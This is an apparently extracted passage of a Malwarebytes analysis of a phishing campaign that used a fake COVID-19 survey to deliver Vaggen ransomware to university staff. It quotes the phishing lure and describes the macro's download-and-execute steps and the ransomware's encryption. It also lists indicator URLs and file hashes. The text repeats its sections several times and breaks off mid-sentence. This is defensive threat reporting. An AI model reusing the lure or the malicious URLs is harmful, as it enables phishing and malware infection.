3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 589 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 590 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 591 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 592 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 593 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 594 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 595 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 596 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 597 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 598 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 599 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 600 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 601 of 3467\n\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 602 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 603 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 604 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 605 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 606 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 607 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 608 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 609 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 610 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 611 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 612 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 613 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 614 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 615 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 616 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 617 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 618 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded 